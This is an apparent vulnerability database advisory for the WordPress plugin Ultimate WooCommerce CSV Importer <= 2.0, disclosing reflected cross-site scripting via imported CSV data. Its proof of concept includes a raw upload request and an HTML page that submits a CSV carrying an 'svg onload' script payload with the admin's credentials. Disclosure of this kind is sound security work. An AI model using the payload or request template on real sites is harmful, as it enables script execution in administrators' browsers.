WordPress Plugin Vulnerabilities
Ultimate WooCommerce CSV Importer <= 2.0 - Reflected Cross-Site Scripting
Description
The plugin does not sanitise and escape the imported data before outputting it back in the page, leading to a Reflected Cross-Site Scripting
Proof of Concept
POST /wp-admin/admin.php?page=simple-woocommerce-csv-loader%2Fadmin%2FCSVLoader.php HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: same-origin Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookies: [logged in admin] Connection: close ------WebKitFormBoundaryYaKY5tnSQ8biGkYB Content-Disposition: form-data; name="post_type" product ------WebKitFormBoundaryYaKY5tnSQ8biGkYB Content-Disposition: form-data; name="separator" , ------WebKitFormBoundaryYaKY5tnSQ8biGkYB Content-Disposition: form-data; name="titeled" on ------WebKitFormBoundaryYaKY5tnSQ8biGkYB Content-Disposition: form-data; name="hierarchical_multicat" on ------WebKitFormBoundaryYaKY5tnSQ8biGkYB Content-Disposition: form-data; name="upload_file"; filename="example_code.csv" Content-Type: text/csv Name,Content,Price,Gender,sku,Multi_cat,Thumbnail Strawberry Short Cake,Delicious Strawberry Cake 18"",80,Bakery,001,Dessert,<svg/onload=alert(/XSS/)> <html> <body> <script> function submitRequest() { var xhr = new XMLHttpRequest(); xhr.open("POST", "https:\/\/example.com\/wp-admin\/admin.php?page=simple-woocommerce-csv-loader%2Fadmin%2FCSVLoader.php", true); xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,*\/*;q=0.8"); xhr.setRequestHeader("Accept-Language", "en-GB,en;q=0.5"); xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------292171499811633611081131645549"); xhr.withCredentials = true; var body = "-----------------------------292171499811633611081131645549\r\n" + "Content-Disposition: form-data; name=\"post_type\"\r\n" + "\r\n" + "product\r\n" + "-----------------------------292171499811633611081131645549\r\n" + "Content-Disposition: form-data; name=\"taxonomy\"\r\n" + "\r\n" + "product_type\r\n" + "-----------------------------292171499811633611081131645549\r\n" + "Content-Disposition: form-data; name=\"separator\"\r\n" + "\r\n" + ",\r\n" + "-----------------------------292171499811633611081131645549\r\n" + "Content-Disposition: form-data; name=\"titeled\"\r\n" + "\r\n" + "on\r\n" + "-----------------------------292171499811633611081131645549\r\n" + "Content-Disposition: form-data; name=\"hierarchical_multicat\"\r\n" + "\r\n" + "on\r\n" + "-----------------------------292171499811633611081131645549\r\n" + "Content-Disposition: form-data; name=\"upload_file\"; filename=\"a.csv\"\r\n" + "Content-Type: text/csv\r\n" + "\r\n" + "Name,Content,Price,Gender,sku,Multi_cat,Thumbnail\n" + "Strawberry Short Cake,Delicious Strawberry Cake 18\"\",80,Bakery,001,Dessert,\x3csvg/onload=alert(/XSS/)\x3e\n" + "\r\n" + "-----------------------------292171499811633611081131645549\r\n" + "Content-Disposition: form-data; name=\"wc_load_csv\"\r\n" + "\r\n" + "Load\r\n" + "-----------------------------292171499811633611081131645549--\r\n"; var aBody = new Uint8Array(body.length); for (var i = 0; i < aBody.length; i++) aBody[i] = body.charCodeAt(i); xhr.send(new Blob([aBody])); } </script> <form action="#"> <input type="button" value="Submit request" onclick="submitRequest();" /> </form> </body> </html>
Affects Plugins
References
CVE
Classification
Type
XSS
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Benachi
Submitter
Benachi
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-06-02 (about 1 years ago)
Added
2022-06-02 (about 1 years ago)
Last Updated
2023-03-04 (about 1 years ago)